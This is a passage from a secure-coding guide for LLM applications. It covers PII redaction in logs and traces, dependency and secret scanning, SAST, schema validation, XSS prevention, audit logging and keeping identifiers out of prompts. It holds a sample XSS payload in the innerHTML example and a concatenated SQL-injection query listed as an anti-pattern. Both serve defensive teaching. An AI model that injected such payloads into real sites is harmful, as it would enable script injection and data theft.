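    return await asyncio.gather(*(asyncio.to_thread(_mask_one, t) for t in texts))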

Incorrect — Logging raw user input exposes PII to log aggregators:

logger.info(f"Processing request for {user.email}")
# Logs: "Processing request for john.doe@company.com"

Correct — Detect and mask PII before logging using Presidio:

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

results = analyzer.analyze(text=user.email, language="en")
masked = anonymizer.anonymize(text=user.email, analyzer_results=results).text
logger.info(f"Processing request for {masked}")
# Logs: "Processing request for [EMAIL_ADDRESS]"

Redact PII from logs and traces automatically in Langfuse, structlog, and observability tools — HIGH

PII Redaction & Observability Integration

Langfuse Mask Callback

import re
from langfuse import Langfuse

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}

def mask_pii(data: dict) -> dict:
    def redact_string(value: str) -> str:
        for entity_type, pattern in PII_PATTERNS.items():
            value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
        return value

    def redact_recursive(obj):
        if isinstance(obj, str):
            return redact_string(obj)
        elif isinstance(obj, dict):
            return {k: redact_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [redact_recursive(item) for item in obj]
        return obj

    return redact_recursive(data)

langfuse = Langfuse(mask=mask_pii)

Langfuse with Presidio

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def presidio_mask(data: dict) -> dict:
    def anonymize_string(value: str) -> str:
        if len(value) < 5:
            return value
        results = analyzer.analyze(text=value, language="en")
        if results:
            return anonymizer.anonymize(text=value, analyzer_results=results).text
        return value

    def process_recursive(obj):
        if isinstance(obj, str):
            return anonymize_string(obj)
        elif isinstance(obj, dict):
            return {k: process_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [process_recursive(item) for item in obj]
        return obj

    return process_recursive(data)

langfuse = Langfuse(mask=presidio_mask)

Structlog PII Processor

import re
import structlog

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    "credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
    "ip": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),  # used by the loguru example below
}

def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
    def redact_value(value):
        if isinstance(value, str):
            result = value
            for entity_type, pattern in PII_PATTERNS.items():
                result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
            return result
        elif isinstance(value, dict):
            return {k: redact_value(v) for k, v in value.items()}
        elif isinstance(value, list):
            return [redact_value(item) for item in value]
        return value

    return {k: redact_value(v) for k, v in event_dict.items()}

structlog.configure(processors=[
    structlog.processors.add_log_level,
    structlog.processors.TimeStamper(fmt="iso"),
    redact_pii,
    structlog.processors.JSONRenderer(),
])

Loguru PII Filter

from loguru import logger

def pii_filter(record):
    message = record["message"]
    for entity_type, pattern in PII_PATTERNS.items():
        message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
    record["message"] = message
    return True

logger.remove()
logger.add("logs/app.log", filter=pii_filter, serialize=True)

# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"

Field-Specific Redaction

SENSITIVE_FIELDS = {
    "email", "phone", "ssn", "credit_card", "password",
    "api_key", "token", "secret", "authorization"
}

def smart_redact_processor(logger, method_name, event_dict):
    result = {}
    for key, value in event_dict.items():
        if key.lower() in SENSITIVE_FIELDS:
            result[key] = "[REDACTED]"
        elif isinstance(value, str):
            # redact_pii_patterns applies the PII_PATTERNS regexes (full version in the reference below)
            result[key] = redact_pii_patterns(value)
        else:
            result[key] = value
    return result

LLM Guard Deanonymization

from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize, Sensitive
from llm_guard.vault import Vault

vault = Vault()
anonymize = Anonymize(vault=vault, language="en")
deanonymize = Deanonymize(vault=vault)

# Anonymize input
sanitized_prompt, _, _ = anonymize.scan(original_prompt)

# Call LLM with sanitized input
llm_response = await llm.generate(sanitized_prompt)

# Restore original values in output
restored_output, _, _ = deanonymize.scan(sanitized_prompt, llm_response)

Full Secure Pipeline

class SecureLLMPipeline:
    def __init__(self, llm):
        self.llm = llm  # any client exposing an async generate() method
        self.vault = Vault()
        self.anonymize = Anonymize(vault=self.vault, language="en")
        self.deanonymize = Deanonymize(vault=self.vault)
        self.sensitive_check = Sensitive(redact=True)

    async def process(self, user_input: str) -> str:
        # 1. Anonymize input
        sanitized_input, _, input_risk = self.anonymize.scan(user_input)

        # 2. Call LLM with sanitized input
        llm_response = await self.llm.generate(sanitized_input)

        # 3. Check output for leaked PII
        checked_output, _, output_risk = self.sensitive_check.scan(
            sanitized_input, llm_response
        )

        # 4. Deanonymize for user
        final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]

        return final_output

Testing

from io import StringIO

def test_pii_redaction_in_logs():
    output = StringIO()
    structlog.configure(
        processors=[redact_pii, structlog.processors.JSONRenderer()],
        logger_factory=structlog.WriteLoggerFactory(file=output),
    )
    logger = structlog.get_logger()
    logger.info("test", email="test@example.com", ssn="123-45-6789")

    log_output = output.getvalue()
    assert "test@example.com" not in log_output
    assert "123-45-6789" not in log_output
    assert "[REDACTED_EMAIL]" in log_output
    assert "[REDACTED_SSN]" in log_output

Incorrect — Sending raw prompts to Langfuse leaks PII to observability platform:

langfuse = Langfuse()
trace = langfuse.trace(
    input="My email is john@example.com and SSN is 123-45-6789"
)
# PII stored in Langfuse without redaction

Correct — Mask callback automatically redacts PII before sending to Langfuse:

langfuse = Langfuse(mask=mask_pii)
trace = langfuse.trace(
    input="My email is john@example.com and SSN is 123-45-6789"
)
# Stored as: "My email is [REDACTED_EMAIL] and SSN is [REDACTED_SSN]"

Scan dependencies for CVEs, detect committed secrets, and run SAST to catch vulnerabilities before production — CRITICAL

Dependency Scanning

Automate vulnerability detection in package dependencies before deployment.

Incorrect — ignoring audit output:

npm audit  # Runs but nobody checks the result
npm install  # Proceeds regardless of vulnerabilities

Correct — automated scanning with severity gates:

# JavaScript (npm)
npm audit --json > security-audit.json
CRITICAL=$(npm audit --json | jq '.metadata.vulnerabilities.critical')
HIGH=$(npm audit --json | jq '.metadata.vulnerabilities.high')

if [ "$CRITICAL" -gt 0 ] || [ "$HIGH" -gt 0 ]; then
  echo "BLOCK: $CRITICAL critical, $HIGH high vulnerabilities"
  exit 1
fi

# Auto-fix safe updates
npm audit fix
# Python (pip-audit)
pip-audit --format=json > security-audit.json

# Alternative: safety
safety check --json > security-audit.json
# Container images (Trivy)
trivy image myapp:latest --format json > trivy-scan.json
CRITICAL=$(cat trivy-scan.json | jq '[.Results[].Vulnerabilities[]? | select(.Severity == "CRITICAL")] | length')

Escalation thresholds:

| Severity | Threshold | Action |
|---|---|---|
| Critical | Any | BLOCK deployment |
| High | > 5 | BLOCK deployment |
| Moderate | > 20 | WARNING |
| Low | > 50 | WARNING |
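
The gate above blocks on any critical/high finding; a sketch of the full table as a shell gate, assuming npm audit --json output saved to security-audit.json:

CRITICAL=$(jq '.metadata.vulnerabilities.critical' security-audit.json)
HIGH=$(jq '.metadata.vulnerabilities.high' security-audit.json)
MODERATE=$(jq '.metadata.vulnerabilities.moderate' security-audit.json)
LOW=$(jq '.metadata.vulnerabilities.low' security-audit.json)

if [ "$CRITICAL" -gt 0 ] || [ "$HIGH" -gt 5 ]; then
  echo "BLOCK: $CRITICAL critical, $HIGH high vulnerabilities"
  exit 1
elif [ "$MODERATE" -gt 20 ] || [ "$LOW" -gt 50 ]; then
  echo "WARNING: $MODERATE moderate, $LOW low vulnerabilities need review"
fi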

Key rules:

  • Run npm audit or pip-audit in CI — block on critical/high findings
  • Use --json output for automation (not human-readable format)
  • Container scanning with Trivy catches OS-level vulnerabilities npm/pip miss
  • Auto-fix with npm audit fix only for non-breaking updates; review breaking fixes manually

Secret Detection

Prevent credentials, API keys, and tokens from being committed to repositories.

Incorrect — relying on .gitignore alone:

# .gitignore only prevents file-level commits, not inline secrets
echo "API_KEY=sk-live-abc123" >> config.py
git add config.py  # Secret committed — now in git history forever

Correct — multi-layer secret detection:

# TruffleHog (scans entire git history)
trufflehog git file://. --json > secrets-scan.json

# Gitleaks (fast, pre-commit friendly)
gitleaks detect --source . --report-format json

# Check results (TruffleHog --json emits one finding per line, so count lines)
SECRET_COUNT=$(wc -l < secrets-scan.json)
if [ "$SECRET_COUNT" -gt 0 ]; then
  echo "BLOCK: $SECRET_COUNT secrets detected!"
  exit 1
fi

Pre-commit hooks (most effective layer):

# .pre-commit-config.yaml
repos:
  # Gitleaks — fast pattern matching
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.0
    hooks:
      - id: gitleaks

  # detect-secrets — supports baselines for false positives
  - repo: https://github.com/Yelp/detect-secrets
    rev: v1.4.0
    hooks:
      - id: detect-secrets
        args: ["--baseline", ".secrets.baseline"]

Baseline for false positives:

# Generate baseline (marks existing non-secrets)
detect-secrets scan > .secrets.baseline

# Audit false positives interactively
detect-secrets audit .secrets.baseline

Key rules:

  • Use pre-commit hooks as first line of defense — catches secrets before they enter history
  • TruffleHog for deep history scanning; Gitleaks for fast pre-commit checks
  • If a secret is committed, rotate it immediately — removing from history is not enough (see the sketch after this list)
  • Use .secrets.baseline to suppress false positives (e.g., example keys in docs)
  • Run both pre-commit AND CI scanning — defense in depth
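
For the rotation rule, a sketch of the cleanup half using git-filter-repo (installed separately; not a git builtin). The secret literal is a placeholder:

# 1. Rotate the credential with its provider first; the old value is burned

# 2. Best-effort scrub: rewrite history, replacing the literal secret everywhere
echo 'sk-live-abc123==>REMOVED' > replacements.txt
git filter-repo --replace-text replacements.txt

# 3. Force-push and have collaborators re-clone; stale clones still hold the secret
git push --force --all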

Static Analysis (SAST)

Run static application security testing to catch vulnerabilities in source code.

Incorrect — relying only on linters for security:

# ESLint/Pylint catch style issues, not security vulnerabilities
eslint .  # Does not detect SQL injection, SSRF, or path traversal

Correct — dedicated SAST tools:

# Semgrep (multi-language, auto rules include OWASP patterns)
semgrep --config=auto --json > semgrep-results.json
CRITICAL=$(cat semgrep-results.json | jq '[.results[] | select(.extra.severity == "ERROR")] | length')

if [ "$CRITICAL" -gt 0 ]; then
  echo "BLOCK: $CRITICAL critical SAST findings"
  exit 1
fi
# Bandit (Python-specific)
bandit -r . -f json -o bandit-report.json
HIGH=$(cat bandit-report.json | jq '[.results[] | select(.issue_severity == "HIGH")] | length')

Pre-commit integration (shift-left):

# .pre-commit-config.yaml
repos:
  - repo: https://github.com/semgrep/semgrep
    rev: v1.52.0
    hooks:
      - id: semgrep
        args: ["--config", "auto", "--error"]

  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.7
    hooks:
      - id: bandit
        args: ["-c", "pyproject.toml", "-r", "."]
        exclude: ^tests/

CI integration:

# GitHub Actions
- name: SAST scan
  run: |
    semgrep --config=auto --json > sast.json
    ERRORS=$(jq '[.results[] | select(.extra.severity == "ERROR")] | length' sast.json)
    if [ "$ERRORS" -gt 0 ]; then
      echo "::error::$ERRORS critical SAST findings"
      exit 1
    fi

Key rules:

  • Use semgrep --config=auto for broad OWASP coverage across languages
  • Bandit is Python-specific — pair with Semgrep for multi-language projects
  • Run SAST in pre-commit hooks (shift-left) AND CI (enforce)
  • Block on ERROR severity; WARNING findings go to a review queue (see the sketch below)
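
A sketch of the review-queue half of the last rule, assuming the same semgrep JSON output as above:

# ERROR findings block the build (handled above); WARNING findings get queued
jq '[.results[] | select(.extra.severity == "WARNING")]' semgrep-results.json > sast-review-queue.json
WARNINGS=$(jq 'length' sast-review-queue.json)
echo "Queued $WARNINGS WARNING findings for security review"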

Validate input with server-side schemas using Zod and Pydantic with allowlist patterns — HIGH

Input Schema Validation

Core Principles

  1. Never trust user input
  2. Validate on server-side (client-side is UX only)
  3. Use allowlists (not blocklists)
  4. Validate type, length, format, range

Zod v4 Schema

import { z } from 'zod';

const UserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  age: z.coerce.number().int().min(0).max(150),
  role: z.enum(['user', 'admin']).default('user'),
});

const result = UserSchema.safeParse(req.body);
if (!result.success) {
  return res.status(400).json({ errors: result.error.flatten() });
}

Type Coercion (v4)

// Query params come as strings - coerce to proper types
z.coerce.number()  // "123" -> 123
z.coerce.boolean() // "true" -> true
z.coerce.date()    // "2024-01-01" -> Date

Pydantic (Python)

from pydantic import BaseModel, EmailStr, Field, field_validator

class User(BaseModel):
    email: EmailStr
    name: str = Field(min_length=2, max_length=100)
    age: int = Field(ge=0, le=150)

    @field_validator('name')
    @classmethod
    def strip_and_title(cls, v: str) -> str:
        return v.strip().title()

Express Middleware

import { Request, Response, NextFunction } from 'express';

function validateBody<T extends z.ZodSchema>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Validation failed',
        details: result.error.flatten().fieldErrors,
      });
    }
    req.body = result.data;
    next();
  };
}

app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
  const user = req.body;  // fully typed and validated
});

Query Parameter Validation

const PaginationSchema = z.object({
  page: z.coerce.number().int().positive().default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
  order: z.enum(['asc', 'desc']).default('desc'),
});

Anti-Patterns

// NEVER rely on client-side validation only
if (formIsValid) submit();  // No server validation

// NEVER use blocklists
const blocked = ['password', 'secret'];  // Easy to miss fields

// NEVER build queries with string concat
"SELECT * FROM users WHERE name = '" + name + "'"  // SQL injection

// ALWAYS validate server-side
const result = schema.safeParse(req.body);

// ALWAYS use allowlists
const allowed = ['name', 'email', 'createdAt'];

// ALWAYS use parameterized queries
db.query('SELECT * FROM users WHERE name = ?', [name]);

Key Decisions

| Decision | Recommendation |
|---|---|
| Validation library | Zod (TS), Pydantic (Python) |
| Strategy | Allowlist over blocklist |
| Location | Server-side always |
| Error messages | Generic (don't leak info; see the sketch below) |
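
On the last row: return field-level validation detail, never internals or stack traces. A short sketch contrasting the two, reusing the middleware above:

// LEAKS INFO: internals and raw input echoed back to the client
res.status(400).json({ error: `DB lookup failed for ${req.body.email}: ${err.stack}` });

// GENERIC: which fields failed, nothing about how the server works
res.status(400).json({
  error: 'Validation failed',
  details: result.error.flatten().fieldErrors,  // e.g. { email: ['Invalid email'] }
});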

Incorrect — Trusting client-side validation allows attackers to bypass checks:

// Client-side only
const email = document.getElementById('email').value;
if (email.includes('@')) {
  await fetch('/api/users', { method: 'POST', body: JSON.stringify({ email }) });
}
// Attacker can bypass with curl/Postman

Correct — Server-side schema validation with Zod ensures all input is validated:

app.post('/api/users', validateBody(z.object({
  email: z.string().email(),
})), async (req, res) => {
  // req.body.email is validated regardless of client
});

Validation: Output Encoding & XSS Prevention — HIGH

Output Encoding & XSS Prevention

HTML Sanitization (Python)

from markupsafe import escape

@app.route('/comment', methods=['POST'])
def create_comment():
    content = escape(request.form['content'])
    db.execute("INSERT INTO comments (content) VALUES (?)", [content])

HTML Sanitization (JavaScript)

import DOMPurify from 'dompurify';

// Sanitize HTML input with allowed tags
const sanitizedHtml = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href'],
});

XSS Prevention

Safe — textContent and React auto-escaping:

// SAFE: textContent escapes HTML entities
element.textContent = userInput;

// React is safe by default
<div>{userInput}</div>  // Auto-escaped

Dangerous — innerHTML and dangerouslySetInnerHTML bypass escaping:

// DANGEROUS: innerHTML can execute scripts
element.innerHTML = userInput;  // NEVER do this with user input

// DANGEROUS: bypasses React escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

Server-Side XSS Prevention (Flask)

from flask import request, render_template_string
from markupsafe import escape

@app.route('/greet')
def greet():
    name = request.args.get('name', '')
    return f"<h1>Hello, {escape(name)}!</h1>"

# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
    return render_template_string(
        "<h1>Hello, {{ name }}!</h1>",
        name=request.args.get('name', '')
    )

Security Headers

SECURITY_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "X-XSS-Protection": "1; mode=block",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Content-Security-Policy": "default-src 'self'",
}

@app.after_request
def add_security_headers(response):
    for header, value in SECURITY_HEADERS.items():
        response.headers[header] = value
    return response

SRI for CDN Scripts

<script src="https://cdn.example.com/lib.js"
        integrity="sha384-..."
        crossorigin="anonymous"></script>

Anti-Patterns

// NEVER use innerHTML with user input
element.innerHTML = userInput;

// NEVER use dangerouslySetInnerHTML without sanitization
<div dangerouslySetInnerHTML={{__html: userInput}} />

// NEVER trust Content-Type header for file validation
if (file.type === 'image/png') {...}  // Can be spoofed

// ALWAYS use textContent or DOMPurify
element.textContent = userInput;
const safe = DOMPurify.sanitize(userInput);

Incorrect — Using innerHTML with user content allows XSS script injection:

const userComment = '<img src=x onerror="alert(1)">';
element.innerHTML = userComment;
// The onerror handler fires (innerHTML never executes <script> tags, but
// event handlers do), stealing cookies/tokens

Correct — Using textContent automatically escapes HTML and prevents XSS:

const userComment = '<img src=x onerror="alert(1)">';
element.textContent = userComment;
// Renders as plain text: <img src=x onerror="alert(1)">

Validation: Advanced Schemas & File Validation — HIGH

Advanced Schemas & File Validation

Discriminated Unions

const NotificationSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('email'),
    email: z.string().email(),
    subject: z.string().min(1),
    body: z.string().min(1),
  }),
  z.object({
    type: z.literal('sms'),
    phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
    message: z.string().max(160),
  }),
  z.object({
    type: z.literal('push'),
    deviceToken: z.string().min(1),
    title: z.string().max(50),
    body: z.string().max(200),
  }),
]);

File Upload Validation

const FileUploadSchema = z.object({
  filename: z.string().min(1).max(255),
  mimeType: z.enum([
    'image/jpeg', 'image/png', 'image/webp', 'application/pdf',
  ]),
  size: z.number().max(10 * 1024 * 1024, 'File must be under 10MB'),
});

// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
  'image/jpeg': [0xFF, 0xD8, 0xFF],
  'image/png': [0x89, 0x50, 0x4E, 0x47],
  'image/webp': [0x52, 0x49, 0x46, 0x46],  // RIFF container; a full check also needs "WEBP" at bytes 8-11
  'application/pdf': [0x25, 0x50, 0x44, 0x46],
};

function validateFileContent(buffer: Buffer, mimeType: string): boolean {
  const expected = imageMagicBytes[mimeType];
  if (!expected) return false;
  return expected.every((byte, i) => buffer[i] === byte);
}

URL Validation with Domain Allowlist

const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;

const SafeUrlSchema = z.string()
  .url()
  .refine(
    (url) => {
      const { hostname, protocol } = new URL(url);
      return protocol === 'https:' &&
        (ALLOWED_DOMAINS as readonly string[]).includes(hostname);
    },
    { message: 'URL must be HTTPS and from allowed domains' }
  );

Form Validation with React Hook Form

import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';

const SignupSchema = z.object({
  email: z.string().email('Invalid email'),
  password: z.string()
    .min(8, 'Password must be at least 8 characters')
    .regex(/[A-Z]/, 'Must contain uppercase')
    .regex(/[0-9]/, 'Must contain number'),
  confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
  message: "Passwords don't match",
  path: ['confirmPassword'],
});

function SignupForm() {
  const { register, handleSubmit, formState: { errors } } = useForm({
    resolver: zodResolver(SignupSchema),
  });
  const onSubmit = (data: z.infer<typeof SignupSchema>) => { /* submit to API */ };

  return (
    <form onSubmit={handleSubmit(onSubmit)}>
      <input {...register('email')} />
      {errors.email && <span>{errors.email.message}</span>}
      <input type="password" {...register('password')} />
      <button type="submit">Sign Up</button>
    </form>
  );
}

Allowlist Pattern

// Only allow specific sort columns
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);

// Dynamic allowlist factory
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
  return z.enum(allowed as [T, ...T[]]);
}

Python Discriminated Union

from pydantic import BaseModel, EmailStr, Field
from typing import Annotated, Literal, Union

class EmailNotification(BaseModel):
    type: Literal['email']
    email: EmailStr
    subject: str
    body: str

class SMSNotification(BaseModel):
    type: Literal['sms']
    phone: str
    message: str = Field(max_length=160)

# Field(discriminator=...) makes Pydantic dispatch on the `type` literal
Notification = Annotated[Union[EmailNotification, SMSNotification], Field(discriminator='type')]

Key Decisions

| Decision | Recommendation |
|---|---|
| File validation | Check magic bytes, not just extension |
| URL validation | HTTPS + domain allowlist |
| Polymorphic data | Discriminated unions |
| Form validation | Zod + React Hook Form |

Incorrect — Trusting file extension or MIME type allows malicious file uploads:

if (file.name.endsWith('.png') && file.type === 'image/png') {
  await uploadFile(file);  // Can be spoofed by renaming .exe to .png
}

Correct — Validating magic bytes ensures file content matches declared type:

const buffer = await file.arrayBuffer();
const bytes = new Uint8Array(buffer);
const isPNG = bytes[0] === 0x89 && bytes[1] === 0x50 && bytes[2] === 0x4E && bytes[3] === 0x47;
if (isPNG) {
  await uploadFile(file);  // Verified actual PNG file
}

References (15)

Audit Logging

Purpose

Audit logs answer: Who did What, When, Where, and Why?

They're required for:

  • Security incident investigation
  • Compliance (SOC2, GDPR, HIPAA)
  • Debugging production issues
  • Usage analytics

What to Log

Always Log (Audit Events)

| Event Type | What to Log | Example |
|---|---|---|
| Authentication | Success/failure, method | "User login via OAuth" |
| Authorization | Decision, resource, action | "Access granted to analysis_123" |
| Data Access | Read/write, resource type | "Read 10 documents" |
| Data Modification | Before/after (hashed), resource | "Updated analysis status" |
| LLM Calls | Model, tokens, latency (NOT prompt) | "GPT-4, 1500 tokens, 2.3s" |
| Errors | Type, context (sanitized) | "ValidationError on /api/analyze" |

Never Log (Sensitive Data)

| Data Type | Why Not | Alternative |
|---|---|---|
| Passwords | Security | Log "password changed" event |
| API Keys | Security | Log key ID, not value |
| Full Prompts | May contain PII | Log prompt hash, token count |
| LLM Responses | May contain generated PII | Log response hash, length |
| User Content | Privacy | Log content hash, length |
| PII | GDPR/Privacy | Log anonymized or redacted |

Implementation

Sanitized Logger

import structlog
import re
import hashlib
from typing import Any

class SanitizedLogger:
    """Logger that automatically redacts sensitive data"""

    REDACT_PATTERNS = {
        r"password": "[PASSWORD_REDACTED]",
        r"api[_-]?key": "[API_KEY_REDACTED]",
        r"secret": "[SECRET_REDACTED]",
        r"token": "[TOKEN_REDACTED]",
        r"authorization": "[AUTH_REDACTED]",
        r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
    }

    HASH_FIELDS = {"prompt", "response", "content"}

    def __init__(self):
        self._logger = structlog.get_logger()

    def _sanitize(self, data: dict[str, Any]) -> dict[str, Any]:
        """Sanitize sensitive fields"""
        result = {}
        for key, value in data.items():
            # Hash content fields instead of logging
            if key.lower() in self.HASH_FIELDS:
                result[f"{key}_hash"] = hashlib.sha256(
                    str(value).encode()
                ).hexdigest()[:16]
                result[f"{key}_length"] = len(str(value))
                continue

            # Redact sensitive patterns
            str_value = str(value)
            for pattern, replacement in self.REDACT_PATTERNS.items():
                if re.search(pattern, key, re.IGNORECASE):
                    result[key] = replacement
                    break
                str_value = re.sub(pattern, replacement, str_value, flags=re.IGNORECASE)
            else:
                result[key] = str_value

        return result

    def audit(self, event: str, **kwargs):
        """Log an audit event with automatic sanitization"""
        sanitized = self._sanitize(kwargs)
        self._logger.info(
            event,
            audit=True,
            **sanitized,
        )

    def info(self, msg: str, **kwargs):
        self._logger.info(msg, **self._sanitize(kwargs))

    def error(self, msg: str, **kwargs):
        self._logger.error(msg, **self._sanitize(kwargs))

Audit Event Structure

from dataclasses import dataclass
from datetime import datetime
from enum import Enum
from uuid import UUID

class AuditAction(Enum):
    CREATE = "create"
    READ = "read"
    UPDATE = "update"
    DELETE = "delete"
    LOGIN = "login"
    LOGOUT = "logout"
    LLM_CALL = "llm_call"
    SEARCH = "search"

@dataclass
class AuditEvent:
    """Structured audit event"""
    # WHO
    user_id: UUID
    tenant_id: UUID
    session_id: str

    # WHAT
    action: AuditAction
    resource_type: str
    resource_id: UUID | None

    # WHEN
    timestamp: datetime

    # WHERE
    request_id: str
    trace_id: str
    ip_address: str
    user_agent: str

    # OUTCOME
    success: bool
    error_code: str | None = None

    # CONTEXT (sanitized)
    metadata: dict | None = None

Usage in OrchestKit

import hashlib

# Authentication
logger.audit(
    "user.login",
    user_id=user.id,
    tenant_id=user.tenant_id,
    method="oauth",
    success=True,
)

# Data Access
logger.audit(
    "documents.search",
    user_id=ctx.user_id,
    tenant_id=ctx.tenant_id,
    query_hash=hashlib.sha256(query.encode()).hexdigest()[:16],  # Not the actual query
    result_count=len(results),
    success=True,
)

# LLM Call
logger.audit(
    "llm.generate",
    user_id=ctx.user_id,
    tenant_id=ctx.tenant_id,
    model="gpt-4",
    input_tokens=1500,
    output_tokens=500,
    latency_ms=2300,
    prompt_hash=hashlib.sha256(prompt.encode()).hexdigest()[:16],  # Not the actual prompt!
    success=True,
)

# Authorization Failure
logger.audit(
    "authorization.denied",
    user_id=ctx.user_id,
    tenant_id=ctx.tenant_id,
    action="analysis:delete",
    resource_id=analysis_id,
    reason="missing permission",
    success=False,
)

Log Retention

| Environment | Retention | Reason |
|---|---|---|
| Development | 7 days | Debugging |
| Staging | 30 days | Testing |
| Production | 1 year | Compliance |
| Security Events | 7 years | Legal requirements |
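
A sketch of the table as configuration; enforcement (log shipper or object-store lifecycle rules) is assumed to live elsewhere:

# Retention in days per environment; security events carry a 7-year legal hold
LOG_RETENTION_DAYS = {
    "development": 7,
    "staging": 30,
    "production": 365,
    "security_events": 365 * 7,
}

def retention_for(environment: str, security_event: bool = False) -> int:
    if security_event:
        return LOG_RETENTION_DAYS["security_events"]
    return LOG_RETENTION_DAYS.get(environment, 30)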

Integration with Langfuse

from langfuse import Langfuse

langfuse = Langfuse()

# Create trace for observability
trace = langfuse.trace(
    name="analysis",
    user_id=str(ctx.user_id),  # Langfuse supports user tracking
    session_id=ctx.session_id,
    metadata={
        "tenant_id": str(ctx.tenant_id),
        "request_id": ctx.request_id,
    },
)

# Log LLM call
generation = trace.generation(
    name="content_analysis",
    model="gpt-4",
    input=prompt,  # redacted by the client's mask callback; never send raw PII
    output=response,
)

Compliance Considerations

GDPR

  • Log data access but not the data itself
  • Provide audit trail for subject access requests (see the sketch below)
  • Log data deletion events
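
A sketch of the subject-access-request trail, assuming AuditEvent records are persisted to an audit_events table (storage is not specified here):

from uuid import UUID

def audit_trail_for_subject(db, user_id: UUID) -> list[dict]:
    """GDPR subject access: return what happened to a user's data, not the data itself."""
    rows = db.execute(
        "SELECT action, resource_type, resource_id, timestamp, success "
        "FROM audit_events WHERE user_id = ? ORDER BY timestamp",
        (str(user_id),),
    )
    return [dict(row) for row in rows]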

SOC2

  • Log all authentication events
  • Log all authorization decisions
  • Log all data modifications
  • Retain logs for audit period

HIPAA

  • Log all access to PHI
  • Log user ID, timestamp, action
  • Never log PHI content in logs

Context Separation

Context Separation Pattern

The Problem

When identifiers appear in LLM prompts, several security issues arise:

┌─────────────────────────────────────────────────────────┐
│  WHAT HAPPENS WHEN IDs GO INTO PROMPTS                  │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  "Analyze document doc_abc123 for user usr_xyz789"      │
│                     │                    │              │
│                     ▼                    ▼              │
│              ┌──────────────────────────────┐           │
│              │           LLM                │           │
│              │                              │           │
│              │  May hallucinate:            │           │
│              │  - doc_abc124 (off by one)   │           │
│              │  - doc_xyz789 (mixed up)     │           │
│              │  - usr_other (cross-tenant)  │           │
│              └──────────────────────────────┘           │
│                                                         │
│  RISKS:                                                 │
│  • Hallucinated IDs don't exist → crashes              │
│  • Mixed IDs → wrong data attribution                  │
│  • Cross-tenant IDs → security breach                  │
│  • IDs in logs/traces → data leakage                   │
│                                                         │
└─────────────────────────────────────────────────────────┘

The Solution: Context Separation

┌─────────────────────────────────────────────────────────┐
│  CORRECT: CONTEXT FLOWS AROUND LLM                      │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  RequestContext ─────────────────────────────────────►  │
│  (user_id, tenant_id, etc.)                    │        │
│         │                                      │        │
│         │   ┌──────────────────────┐          │        │
│         │   │                      │          │        │
│         ▼   │       LLM            │          ▼        │
│  ┌──────────┤                      ├─────────────┐     │
│  │ Content  │  Sees ONLY:          │  Content +  │     │
│  │ (text)   │  - Document text     │  Context    │     │
│  │          │  - Query text        │  (merged)   │     │
│  └──────────┤  - Instructions      ├─────────────┘     │
│             │                      │                    │
│             │  NO IDs!             │                    │
│             └──────────────────────┘                    │
│                                                         │
└─────────────────────────────────────────────────────────┘

Implementation

1. Define What's Forbidden

# OrchestKit parameters that NEVER go in prompts
FORBIDDEN_IN_PROMPTS = {
    # User identity
    "user_id",      # UUID - hallucination risk
    "tenant_id",    # UUID - cross-tenant risk
    "session_id",   # String - auth context

    # Resource references
    "analysis_id",  # UUID - job tracking
    "document_id",  # UUID - source tracking
    "artifact_id",  # UUID - output tracking
    "chunk_id",     # UUID - RAG reference

    # System context
